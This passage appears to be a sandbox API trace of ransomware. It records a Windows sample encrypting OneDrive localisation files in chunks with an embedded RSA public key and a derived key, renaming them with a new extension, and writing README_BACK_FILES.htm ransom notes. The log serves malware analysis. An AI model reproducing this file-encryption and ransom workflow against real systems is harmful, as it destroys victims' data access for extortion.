Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.619] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0276.620] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0276.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0276.621] CloseHandle (hObject=0x5d3c) returned 1 [0276.621] CloseHandle (hObject=0x5d48) returned 1 [0276.621] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.627] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.627] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.630] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.631] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.631] CryptDestroyKey (hKey=0x2fb308) returned 1 [0276.632] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.632] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.632] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.632] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\readme_back_files.htm")) returned 0xffffffff [0276.632] AreFileApisANSI () returned 1 [0276.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.632] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.633] GetFileType (hFile=0x5d4c) returned 0x1 [0276.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.635] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.635] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.635] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.635] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.635] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.635] GetLastError () returned 0x0 [0276.635] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.635] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.636] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.637] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hy\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.638] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.638] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0276.640] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.640] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.640] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.641] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb808) returned 1 [0276.641] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.641] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.641] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b6a8) returned 1 [0276.641] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b6a8, dwCertEncodingType=0x1, pInfo=0x2f36050*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36080*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36088*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb548) returned 1 [0276.641] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.641] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b158*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b158*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.642] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2b158*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b158*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.646] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.647] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.647] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.648] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, 